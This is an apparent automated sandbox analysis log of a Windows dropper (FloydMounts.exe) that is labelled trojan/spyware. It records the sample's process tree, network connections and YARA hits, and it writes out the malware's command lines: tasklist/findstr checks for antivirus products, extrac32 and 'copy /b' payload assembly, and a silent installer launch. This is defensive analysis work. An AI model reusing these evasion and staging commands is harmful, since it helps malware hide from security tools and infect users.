              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmp, FloydMounts.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.certum.pl/CPS0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: FloydMounts.exeString found in binary or memory: https://www.globalsign.com/repository/0
              Source: X4PCDQPDT1B8IDPB7SN83.exe, 00000011.00000003.2560003095.000000007EFCB000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.exe, 00000011.00000003.2552320717.0000000002C2F000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000000.2561740283.0000000000471000.00000020.00000001.01000000.00000009.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000000.2575985053.00000000008CD000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.innosetup.com/
              Source: X4PCDQPDT1B8IDPB7SN83.exe, 00000011.00000003.2560003095.000000007EFCB000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.exe, 00000011.00000003.2552320717.0000000002C2F000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000000.2561740283.0000000000471000.00000020.00000001.01000000.00000009.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000000.2575985053.00000000008CD000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.remobjects.com/ps
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.74.235:443 -> 192.168.2.4:49763 version: TLS 1.2
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
              Source: Yara matchFile source: Process Memory Space: ulu_mon.exe PID: 5628, type: MEMORYSTR
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeCode function: 47_2_00528379 NtQuerySystemInformation,47_2_00528379
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
              Source: C:\Users\user\Desktop\FloydMounts.exeFile created: C:\Windows\BrightAnnounceJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeFile created: C:\Windows\CurveSapJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeFile created: C:\Windows\ProvedBruneiJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeFile created: C:\Windows\IntroducedCompileJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeFile created: C:\Windows\BDearJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_0040737E0_2_0040737E
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_00406EFE0_2_00406EFE
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_004079A20_2_004079A2
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_004049A80_2_004049A8
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeCode function: 47_2_0052600047_2_00526000
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\174436\Produces.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: String function: 004062CF appears 58 times
              Source: FloydMounts.exeStatic PE information: invalid certificate
              Source: X4PCDQPDT1B8IDPB7SN83.tmp.17.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: X4PCDQPDT1B8IDPB7SN83.tmp.19.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: is-PGV92.tmp.20.drStatic PE information: Resource name: UNICODEDATA type: DOS executable (COM, 0x8C-variant)
              Source: is-PGV92.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
              Source: X4PCDQPDT1B8IDPB7SN83.tmp.19.drStatic PE information: Number of sections : 11 > 10
              Source: X4PCDQPDT1B8IDPB7SN83.exe.11.drStatic PE information: Number of sections : 11 > 10
              Source: X4PCDQPDT1B8IDPB7SN83.tmp.17.drStatic PE information: Number of sections : 11 > 10
              Source: FloydMounts.exe, 00000000.00000003.1662747809.0000000000702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs FloydMounts.exe
              Source: FloydMounts.exe, 00000000.00000002.1663429752.0000000000702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs FloydMounts.exe
              Source: FloydMounts.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@79/31@3/2
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpFile created: C:\Users\user\AppData\Roaming\UltraMediaJump to behavior
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeMutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_5628
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3248:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1168:120:WilError_03
              Source: C:\Users\user\Desktop\FloydMounts.exeFile created: C:\Users\user\AppData\Local\Temp\nsm26CA.tmpJump to behavior
              Source: Yara matchFile source: 47.0.ulu_mon.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: FloydMounts.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
              Source: C:\Users\user\Desktop\FloydMounts.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\FloydMounts.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
              Source: tasklist.exe, 00000005.00000002.1682411136.0000000000743000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000005.00000003.1681795428.000000000073A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000005.00000003.1681947297.0000000000742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_ProcessEXE;kk
              Source: FloydMounts.exeVirustotal: Detection: 25%
              Source: FloydMounts.exeReversingLabs: Detection: 18%
              Source: C:\Users\user\Desktop\FloydMounts.exeFile read: C:\Users\user\Desktop\FloydMounts.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\FloydMounts.exe "C:\Users\user\Desktop\FloydMounts.exe"
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Blvd Blvd.cmd & Blvd.cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 174436
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Contribute
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "nightlife" Consultants
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Share + ..\Crimes + ..\Briefing + ..\Rj + ..\Pierre + ..\Loving U
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\174436\Produces.com Produces.com U
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comProcess created: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe "C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe"
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeProcess created: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp "C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp" /SL5="$5044E,10753133,845824,C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe "C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeProcess created: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp "C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp" /SL5="$6044E,10753133,845824,C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
              Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe "C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe"
              Source: C:\Users\user\Desktop\FloydMounts.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Blvd Blvd.cmd & Blvd.cmdJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 174436Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ContributeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "nightlife" Consultants Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\174436\Produces.com Produces.com UJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comProcess created: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe "C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeProcess created: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp "C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp" /SL5="$5044E,10753133,845824,C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe "C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exeProcess created: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp "C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp" /SL5="$6044E,10753133,845824,C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
